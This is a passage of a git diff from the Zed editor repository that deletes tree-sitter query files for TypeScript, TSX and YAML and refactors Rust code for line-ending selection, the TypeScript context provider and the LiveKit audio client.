(identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/tsx/runnables.scm b/crates/languages/src/tsx/runnables.scm deleted file mode 100644 index 85702cf99d9968b29f9375bfd8215ecba53f2eb5..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/runnables.scm +++ /dev/null @@ -1,46 +0,0 @@ -; Add support for (node:test, bun:test and Jest) runnable -; Function expression that has `it`, `test` or `describe` as the function name 
-( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) diff --git a/crates/languages/src/tsx/textobjects.scm b/crates/languages/src/tsx/textobjects.scm deleted file mode 100644 index 628a921f3ac9ea04ff59654d72caf73cebbc9071..0000000000000000000000000000000000000000 --- a/crates/languages/src/tsx/textobjects.scm +++ /dev/null @@ -1,113 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? 
@function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration (expression body fallback) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? @function.around variable_declarator)) -(function_signature) @function.around - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - (_)* @class.inside - "}" )) @class.around - -(interface_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(enum_declaration - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(ambient_declaration - (module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" ))) @class.around - -(internal_module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(type_alias_declaration) @class.around diff --git a/crates/languages/src/typescript.rs b/crates/languages/src/typescript.rs index 2b2fb19c629f85c6b51eba64d154b43e716f6827..714191ace093aa4c592316692dae3db0cdc24223 100644 --- a/crates/languages/src/typescript.rs +++ b/crates/languages/src/typescript.rs @@ -3,11 +3,11 @@ 
use async_trait::async_trait; use chrono::{DateTime, Local}; use collections::HashMap; use futures::future::join_all; -use gpui::{App, AppContext, AsyncApp, Task}; +use gpui::{App, AppContext, AsyncApp, Entity, Task}; use itertools::Itertools as _; use language::{ - ContextLocation, ContextProvider, File, LanguageName, LanguageToolchainStore, LspAdapter, - LspAdapterDelegate, LspInstaller, Toolchain, + Buffer, ContextLocation, ContextProvider, File, LanguageName, LanguageToolchainStore, + LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain, }; use lsp::{CodeActionKind, LanguageServerBinary, LanguageServerName, Uri}; use node_runtime::{NodeRuntime, VersionStrategy}; @@ -425,10 +425,11 @@ async fn detect_package_manager( impl ContextProvider for TypeScriptContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { - let Some(file) = project::File::from_dyn(file.as_ref()).cloned() else { + let file = buffer.and_then(|buffer| buffer.read(cx).file()); + let Some(file) = project::File::from_dyn(file).cloned() else { return Task::ready(None); }; let Some(worktree_root) = file.worktree.read(cx).root_dir() else { @@ -804,6 +805,7 @@ impl LspAdapter for TypeScriptLspAdapter { async fn initialization_options( self: Arc, adapter: &Arc, + _: &mut AsyncApp, ) -> Result> { let tsdk_path = self.tsdk_path(adapter).await; Ok(Some(json!({ diff --git a/crates/languages/src/typescript/brackets.scm b/crates/languages/src/typescript/brackets.scm deleted file mode 100644 index 635233849142d8951edeca02ca0c79253aa91e80..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/typescript/debugger.scm b/crates/languages/src/typescript/debugger.scm deleted file mode 100644 index a99f194a4a4130210b47f8170fca039acc163411..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/debugger.scm +++ /dev/null @@ -1,23 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/typescript/imports.scm b/crates/languages/src/typescript/imports.scm deleted file mode 100644 index 68ca25b2c15b7e312edbc3eeb9b2f0e493ca2d6f..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/imports.scm +++ /dev/null @@ -1,20 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? 
@alias)) - (namespace_import) @wildcard - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !source - import_clause: (import_require_clause - source: (string (string_fragment) @source))) @wildcard @import - -(import_statement - !import_clause - source: (string (string_fragment) @source)) @wildcard @import diff --git a/crates/languages/src/typescript/indents.scm b/crates/languages/src/typescript/indents.scm deleted file mode 100644 index b4ac50bf5ac0bf1871523cabc9ee3683a28cd0f3..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/indents.scm +++ /dev/null @@ -1,17 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - ; below handled by `(_ "{" "}" @end) @indent` - ; (if_statement) - ; (for_statement) - ; (while_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/typescript/injections.scm b/crates/languages/src/typescript/injections.scm deleted file mode 100644 index 91880407900e7407e46982a54dbeaa3e30277bdd..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/injections.scm +++ /dev/null @@ -1,169 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -(((comment) @_reference - (#match? @_reference "^///\\s+\\s*$")) @injection.content - (#set! injection.language "html")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? 
@_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? @_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string) @injection.content - (#set! injection.language "html") -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? 
@_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "isograph"))) -) - -;; Angular Component template injection -(call_expression - function: [ - (identifier) @_decorator (#eq? @_decorator "Component") - (member_expression property: (property_identifier) @_decorator (#eq? @_decorator "Component")) - ] - arguments: (arguments (object - (pair - key: (property_identifier) @_prop (#eq? @_prop "template") - value: [ - (string) @injection.content - (template_string) @injection.content - (template_string (string_fragment) @injection.content) - ] - ))) - (#set! injection.language "angular")) - -;; Angular Component styles injection -(call_expression - function: [ - (identifier) @_decorator (#eq? @_decorator "Component") - (member_expression property: (property_identifier) @_decorator (#eq? @_decorator "Component")) - ] - arguments: (arguments (object - (pair - key: (property_identifier) @_prop (#eq? @_prop "styles") - value: [ - (string) @injection.content - (template_string) @injection.content - (template_string (string_fragment) @injection.content) - (array (string) @injection.content) - (array (template_string) @injection.content) - (array (template_string (string_fragment)) @injection.content) - ] - ))) - (#set! injection.language "css")) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! 
injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! injection.language "css") -) diff --git a/crates/languages/src/typescript/outline.scm b/crates/languages/src/typescript/outline.scm deleted file mode 100644 index 54d29007c7b7eb57c0bcaefc2c1e0ab75e4d9a6c..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/outline.scm +++ /dev/null @@ -1,230 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(type_alias_declaration - "type" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? 
@context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Exported array destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Exported object destructuring -(export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -(abstract_class_declaration - "abstract" @context - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) 
-(class_body - (method_definition - [ - "get" - "set" - "async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . 
[ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/typescript/overrides.scm b/crates/languages/src/typescript/overrides.scm deleted file mode 100644 index 8f437a1424af06aa4855aac67511926181977936..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/overrides.scm +++ /dev/null @@ -1,9 +0,0 @@ -(comment) @comment.inclusive - -(string) @string - -(template_string (string_fragment) @string) - -(_ value: (call_expression - function: (identifier) @function_name_before_type_arguments - type_arguments: (type_arguments))) diff --git a/crates/languages/src/typescript/runnables.scm b/crates/languages/src/typescript/runnables.scm deleted file mode 100644 index 6bfc53632910ce8212f739d310e3d560d05cffc1..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/runnables.scm +++ /dev/null @@ -1,85 +0,0 @@ -; Add support for (node:test, bun:test, Jest 
and Deno.test) runnable -; Function expression that has `it`, `test` or `describe` as the function name -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#any-of? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for Deno.test with string names -( - (call_expression - function: (member_expression - object: (identifier) @_namespace - property: (property_identifier) @_method - ) - (#eq? @_namespace "Deno") - (#eq? @_method "test") - arguments: ( - arguments . [ - (string (string_fragment) @run @DENO_TEST_NAME) - (identifier) @run @DENO_TEST_NAME - ] - ) - ) @_js-test - - (#set! tag js-test) -) - -; Add support for Deno.test with named function expressions -( - (call_expression - function: (member_expression - object: (identifier) @_namespace - property: (property_identifier) @_method - ) - (#eq? @_namespace "Deno") - (#eq? @_method "test") - arguments: ( - arguments . (function_expression - name: (identifier) @run @DENO_TEST_NAME - ) - ) - ) @_js-test - - (#set! 
tag js-test) -) diff --git a/crates/languages/src/typescript/textobjects.scm b/crates/languages/src/typescript/textobjects.scm deleted file mode 100644 index 96289f058cd7b605a8f5b4c8966e3c372022d065..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/textobjects.scm +++ /dev/null @@ -1,114 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? @function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration - capture body as @function.inside -; (for statement blocks, the more specific pattern above captures just the contents) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? 
@function.around variable_declarator)) -(function_signature) @function.around - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - (_)* @class.inside - "}" )) @class.around - -(interface_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(enum_declaration - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(ambient_declaration - (module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" ))) @class.around - -(internal_module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(type_alias_declaration) @class.around diff --git a/crates/languages/src/yaml/brackets.scm b/crates/languages/src/yaml/brackets.scm deleted file mode 100644 index 0cfc5072d4eeda19d75ce943481670a3ee8938b0..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/brackets.scm +++ /dev/null @@ -1,4 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/yaml/injections.scm b/crates/languages/src/yaml/injections.scm deleted file mode 100644 index c9de25a18f8afb7d8e0c6874401798edede9bce1..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/injections.scm +++ /dev/null @@ -1,25 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -; GitHub actions: JavaScript for workflow scripting (inline and block) -(block_mapping - (block_mapping_pair - key: (flow_node) @_uses (#eq? @_uses "uses") - value: (flow_node) @_actions_ghs (#match? @_actions_ghs "^actions/github-script")) - (block_mapping_pair - key: (flow_node) @_with (#eq? 
@_with "with") - value: (block_node - (block_mapping - (block_mapping_pair - key: (flow_node) @_run (#eq? @_run "script") - value: [ - (flow_node (plain_scalar (string_scalar) @injection.content)) - (block_node (block_scalar) @injection.content) - ] - (#set! injection.language "javascript") - ) - ) - ) - ) -) diff --git a/crates/languages/src/yaml/outline.scm b/crates/languages/src/yaml/outline.scm deleted file mode 100644 index c5a7f8e5d40388c020ec9dab83d6cee02746b581..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/outline.scm +++ /dev/null @@ -1,9 +0,0 @@ -(block_mapping_pair - key: - (flow_node - (plain_scalar - (string_scalar) @name)) - value: - (flow_node - (plain_scalar - (string_scalar) @context))?) @item diff --git a/crates/languages/src/yaml/redactions.scm b/crates/languages/src/yaml/redactions.scm deleted file mode 100644 index 85fdbd26ea0fc0b3956652ef48c61a44613337e4..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/redactions.scm +++ /dev/null @@ -1 +0,0 @@ -(block_mapping_pair value: (flow_node) @redact) diff --git a/crates/languages/src/zed-keybind-context/brackets.scm b/crates/languages/src/zed-keybind-context/brackets.scm deleted file mode 100644 index d086b2e98df0837208a13f6c6f79db84c204fb99..0000000000000000000000000000000000000000 --- a/crates/languages/src/zed-keybind-context/brackets.scm +++ /dev/null @@ -1 +0,0 @@ -("(" @open ")" @close) diff --git a/crates/line_ending_selector/src/line_ending_indicator.rs b/crates/line_ending_selector/src/line_ending_indicator.rs index ee858d706b3a8152c868a5bd629c112a4d1b225f..9c493344e757174035a30e42126389ced9ea1624 100644 --- a/crates/line_ending_selector/src/line_ending_indicator.rs +++ b/crates/line_ending_selector/src/line_ending_indicator.rs @@ -18,7 +18,7 @@ impl LineEndingIndicator { self.line_ending = None; self.active_editor = None; - if let Some((_, buffer, _)) = editor.read(cx).active_excerpt(cx) { + if let Some(buffer) = 
editor.read(cx).active_buffer(cx) { let line_ending = buffer.read(cx).line_ending(); self.line_ending = Some(line_ending); self.active_editor = Some(editor.downgrade()); diff --git a/crates/line_ending_selector/src/line_ending_selector.rs b/crates/line_ending_selector/src/line_ending_selector.rs index 504c327a349c97214e801f6bd375d61c7847f2be..455807565f8be52e574327f10d5881bb575c60f3 100644 --- a/crates/line_ending_selector/src/line_ending_selector.rs +++ b/crates/line_ending_selector/src/line_ending_selector.rs @@ -40,7 +40,7 @@ impl LineEndingSelector { fn toggle(editor: &WeakEntity, window: &mut Window, cx: &mut App) { let Some((workspace, buffer)) = editor .update(cx, |editor, cx| { - Some((editor.workspace()?, editor.active_excerpt(cx)?.1)) + Some((editor.workspace()?, editor.active_buffer(cx)?)) }) .ok() .flatten() diff --git a/crates/livekit_client/Cargo.toml b/crates/livekit_client/Cargo.toml index e4c530bbcb3864cf2557f15ef02ddbe7e81852c7..42c13f094c1893260f474c98f650ba83be832ef0 100644 --- a/crates/livekit_client/Cargo.toml +++ b/crates/livekit_client/Cargo.toml @@ -40,15 +40,16 @@ serde.workspace = true serde_urlencoded.workspace = true settings.workspace = true smallvec.workspace = true -tokio-tungstenite.workspace = true ui.workspace = true util.workspace = true [target.'cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))'.dependencies] -libwebrtc = { rev = "5f04705ac3f356350ae31534ffbc476abc9ea83d", git = "https://github.com/zed-industries/livekit-rust-sdks" } -livekit = { rev = "5f04705ac3f356350ae31534ffbc476abc9ea83d", git = "https://github.com/zed-industries/livekit-rust-sdks", features = [ - "__rustls-tls" -] } +libwebrtc.workspace = true +livekit.workspace = true + +[target.'cfg(target_os = "linux")'.dependencies] +tokio = { workspace = true, features = ["time"] } +webrtc-sys.workspace = true [target.'cfg(any(target_os = "linux", target_os = "freebsd", target_os = "windows"))'.dependencies] scap.workspace = true @@ 
-64,7 +65,6 @@ objc.workspace = true collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } gpui_platform.workspace = true -sha2.workspace = true simplelog.workspace = true [build-dependencies] diff --git a/crates/livekit_client/examples/test_app.rs b/crates/livekit_client/examples/test_app.rs index 06b9a1402a5c313117dfe559d1f293b6393c6172..eb87aa6cae4530f31fa778b162d585de0cbb253b 100644 --- a/crates/livekit_client/examples/test_app.rs +++ b/crates/livekit_client/examples/test_app.rs @@ -35,15 +35,7 @@ fn main() { cx.activate(true); cx.on_action(quit); cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Zed".into(), - items: vec![MenuItem::Action { - name: "Quit".into(), - action: Box::new(Quit), - os_action: None, - checked: false, - }], - }]); + cx.set_menus([Menu::new("Zed").items([MenuItem::action("Quit", Quit)])]); let livekit_url = std::env::var("LIVEKIT_URL").unwrap_or("http://localhost:7880".into()); let livekit_key = std::env::var("LIVEKIT_KEY").unwrap_or("devkey".into()); @@ -255,7 +247,7 @@ impl LivekitWindow { } else { let room = self.room.clone(); cx.spawn_in(window, async move |this, cx| { - let (publication, stream) = room + let (publication, stream, _input_lag_us) = room .publish_local_microphone_track("test_user".to_string(), false, cx) .await .unwrap(); diff --git a/crates/livekit_client/src/lib.rs b/crates/livekit_client/src/lib.rs index be008d8db5108fb087415edb9d2de91bad19ab97..aa4831562c2f70cf505d1042f1c9446504dce9fd 100644 --- a/crates/livekit_client/src/lib.rs +++ b/crates/livekit_client/src/lib.rs @@ -1,8 +1,8 @@ use anyhow::Context as _; use collections::HashMap; +use cpal::DeviceId; mod remote_video_track_view; -use cpal::traits::HostTrait as _; pub use remote_video_track_view::{RemoteVideoTrackView, RemoteVideoTrackViewEvent}; use rodio::DeviceTrait as _; @@ -67,6 +67,14 @@ pub enum Participant { Remote(RemoteParticipant), } 
+#[derive(Copy, Clone, Debug, Eq, PartialEq, PartialOrd, Ord)] +pub enum ConnectionQuality { + Excellent, + Good, + Poor, + Lost, +} + #[derive(Debug, Clone)] pub enum TrackPublication { Local(LocalTrackPublication), @@ -179,6 +187,10 @@ pub enum RoomEvent { ActiveSpeakersChanged { speakers: Vec, }, + ConnectionQualityChanged { + participant: Participant, + quality: ConnectionQuality, + }, ConnectionStateChanged(ConnectionState), Connected { participants_with_tracks: Vec<(RemoteParticipant, Vec)>, @@ -192,24 +204,18 @@ pub enum RoomEvent { pub(crate) fn default_device( input: bool, + device_id: Option<&DeviceId>, ) -> anyhow::Result<(cpal::Device, cpal::SupportedStreamConfig)> { - let device; - let config; - if input { - device = cpal::default_host() - .default_input_device() - .context("no audio input device available")?; - config = device + let device = audio::resolve_device(device_id, input)?; + let config = if input { + device .default_input_config() - .context("failed to get default input config")?; + .context("failed to get default input config")? } else { - device = cpal::default_host() - .default_output_device() - .context("no audio output device available")?; - config = device + device .default_output_config() - .context("failed to get default output config")?; - } + .context("failed to get default output config")? 
+ }; Ok((device, config)) } diff --git a/crates/livekit_client/src/livekit_client.rs b/crates/livekit_client/src/livekit_client.rs index 6fc1d3415a493e7e1989472616015916a82cf818..1c1cc5c3b7075b90950d85bbc92ba186a4f415ba 100644 --- a/crates/livekit_client/src/livekit_client.rs +++ b/crates/livekit_client/src/livekit_client.rs @@ -1,21 +1,21 @@ -use std::sync::Arc; - -use anyhow::{Context as _, Result, anyhow}; +use anyhow::{Context as _, Result}; use audio::AudioSettings; use collections::HashMap; use futures::{SinkExt, channel::mpsc}; use gpui::{App, AsyncApp, ScreenCaptureSource, ScreenCaptureStream, Task}; use gpui_tokio::Tokio; -use log::info; + use playback::capture_local_video_track; use settings::Settings; +use std::sync::{Arc, atomic::AtomicU64}; +#[cfg(target_os = "linux")] +mod linux; mod playback; -use crate::{ - LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication, - livekit_client::playback::Speaker, -}; +use crate::{ConnectionQuality, LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication}; +pub use livekit::SessionStats; +pub use livekit::webrtc::stats::RtcStats; pub use playback::AudioStream; pub(crate) use playback::{RemoteVideoFrame, play_remote_video_track}; @@ -54,10 +54,8 @@ impl Room { token: String, cx: &mut AsyncApp, ) -> Result<(Self, mpsc::UnboundedReceiver)> { - let connector = - tokio_tungstenite::Connector::Rustls(Arc::new(http_client_tls::tls_config())); let mut config = livekit::RoomOptions::default(); - config.connector = Some(connector); 